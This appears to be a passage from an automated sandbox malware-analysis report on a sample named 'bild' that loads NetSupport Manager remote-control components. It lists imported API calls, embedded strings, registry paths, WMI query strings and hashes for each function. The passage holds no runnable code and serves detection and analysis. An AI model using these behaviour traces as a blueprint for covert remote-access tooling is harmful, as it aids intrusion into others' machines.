                                                                                                                • Part of subcall function 6C792420: _strrchr.LIBCMT ref: 6C79242E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                              • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                              • API String ID: 2714439535-3484705551
                                                                                                              • Opcode ID: 5fd017e77c40768ef032b5d9d12be357cec98ef538a1d4ea790153f23a034163
                                                                                                              • Instruction ID: 0520d53ec063604d2922b03404861c2798b52450d4ecde9776f42054c9d09877
                                                                                                              • Opcode Fuzzy Hash: 5fd017e77c40768ef032b5d9d12be357cec98ef538a1d4ea790153f23a034163
                                                                                                              • Instruction Fuzzy Hash: 6D41F871B00218ABDB10DF51EE49FEA737CEB45708F0405B5EA19E7A40EB71AA48CF61
                                                                                                              APIs
                                                                                                                • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                                              • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                                              • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                                              • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                                              • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                                              • GetLastError.KERNEL32 ref: 11102CB1
                                                                                                              • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                                              • GetLastError.KERNEL32 ref: 11102CCF
                                                                                                              Strings
                                                                                                              • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                                              • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                                              • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                              • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                              • API String ID: 2036220054-60805735
                                                                                                              • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                                              • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                                              • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                                              • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                                              APIs
                                                                                                              • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                                              • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                                              • wsprintfA.USER32 ref: 1115E3C8
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                              • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                                              • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                              • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                              • API String ID: 1734919802-1728070458
                                                                                                              • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                                              • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                                              • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                                              • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                                              APIs
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • std::exception::exception.LIBCMT ref: 1111013A
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                              • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                              • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                              • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                              • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                              • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                              • API String ID: 1976012330-1024648535
                                                                                                              • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                                              • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                                              • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                                              • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                                              APIs
                                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,E43C2CA5,00000000,?,00000000), ref: 11060874
                                                                                                              • _malloc.LIBCMT ref: 110608BB
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,E43C2CA5,00000000), ref: 110608FB
                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
                                                                                                              • _free.LIBCMT ref: 11060974
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                              • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                              • API String ID: 999355418-161875503
                                                                                                              • Opcode ID: e88566b1e99c5d1f4ff92394a3baaf1e9843b829efec423eb81681958f92fc3b
                                                                                                              • Instruction ID: c47c75eefe38bee888b154a00c4449ad07b8701d7df13cace45a3bfee881b040
                                                                                                              • Opcode Fuzzy Hash: e88566b1e99c5d1f4ff92394a3baaf1e9843b829efec423eb81681958f92fc3b
                                                                                                              • Instruction Fuzzy Hash: E3A1B075A007469FE721CF64C880BABFBF8AF45308F044A5CE99697684E770F508CBA1
                                                                                                              APIs
                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,E43C2CA5,00000000,?), ref: 1115BA67
                                                                                                              • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                                              • wsprintfW.USER32 ref: 1115BAA7
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                                              • wsprintfW.USER32 ref: 1115BB67
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                              • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                              • API String ID: 3050498177-823534439
                                                                                                              • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                                              • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                                              • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                                              • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                                              APIs
                                                                                                              • _calloc.LIBCMT ref: 6C7A2FBB
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A300D
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6C7A301B
                                                                                                              • _calloc.LIBCMT ref: 6C7A303B
                                                                                                              • _memmove.LIBCMT ref: 6C7A3049
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6C7A307F
                                                                                                              • SetEvent.KERNEL32(000002F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,938234B3), ref: 6C7A308C
                                                                                                                • Part of subcall function 6C7A28D0: wsprintfA.USER32 ref: 6C7A2965
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                              • String ID: a3zl$a3zl
                                                                                                              • API String ID: 3178096747-2438949879
                                                                                                              • Opcode ID: 240118e50c599e09e38f90edaf39d6a26a4ae7c18f3ccd426de57b3ab03bcffb
                                                                                                              • Instruction ID: 73d03c7521e54fae2363c55df9d5c17e8fecd1e656ef3c58954e69034aa5f951
                                                                                                              • Opcode Fuzzy Hash: 240118e50c599e09e38f90edaf39d6a26a4ae7c18f3ccd426de57b3ab03bcffb
                                                                                                              • Instruction Fuzzy Hash: 46415AB5D00209AFDB00DFE9D948AEFB7B9EF48304F108626E515E7640E771E545CBA1
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6C7B0F2B,67CAFB23,00000000,?,?,6C7CF278,000000FF,?,6C79AE0A,?,00000000,?,00000080), ref: 6C7B0D48
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6C7B0D5B
                                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6C7DCB4C,?,?,6C7CF278,000000FF,?,6C79AE0A,?,00000000,?,00000080), ref: 6C7B0D76
                                                                                                              • _malloc.LIBCMT ref: 6C7B0D8C
                                                                                                                • Part of subcall function 6C7B1B69: __FF_MSGBANNER.LIBCMT ref: 6C7B1B82
                                                                                                                • Part of subcall function 6C7B1B69: __NMSG_WRITE.LIBCMT ref: 6C7B1B89
                                                                                                                • Part of subcall function 6C7B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C7BD3C1,6C7B6E81,00000001,6C7B6E81,?,6C7BF447,00000018,6C7D7738,0000000C,6C7BF4D7), ref: 6C7B1BAE
                                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6C7CF278,000000FF,?,6C79AE0A,?,00000000,?), ref: 6C7B0D9F
                                                                                                              • _free.LIBCMT ref: 6C7B0D84
                                                                                                                • Part of subcall function 6C7B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C7B1C13
                                                                                                                • Part of subcall function 6C7B1BFD: GetLastError.KERNEL32(00000000), ref: 6C7B1C25
                                                                                                              • _free.LIBCMT ref: 6C7B0DAF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                              • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                              • API String ID: 1360380336-1843585929
                                                                                                              • Opcode ID: ceb9561f4833fe2a0cbce5f270e3ed194f25c3821929a43d35d60f8a1060f428
                                                                                                              • Instruction ID: 098362c73863fe3e7b7e132d9c50363d70caa2a81e4a616268398aa530a2d8bb
                                                                                                              • Opcode Fuzzy Hash: ceb9561f4833fe2a0cbce5f270e3ed194f25c3821929a43d35d60f8a1060f428
                                                                                                              • Instruction Fuzzy Hash: 2E018FF56003817BE6209F709E8AF5777A8AB41B08F20492CF956EFAC0EA71F444C764
                                                                                                              APIs
                                                                                                                • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                                                • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                                              • _memset.LIBCMT ref: 11145485
                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                              • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                              • API String ID: 4251163631-545709139
                                                                                                              • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                                              • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                                              • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                                              • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                                              APIs
                                                                                                              • wsprintfA.USER32 ref: 110150CA
                                                                                                              • _memset.LIBCMT ref: 1101510E
                                                                                                              • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                                              Strings
                                                                                                              • PackedCatalogItem, xrefs: 11015132
                                                                                                              • NSLSP, xrefs: 11015158
                                                                                                              • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                                              • %012d, xrefs: 110150C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
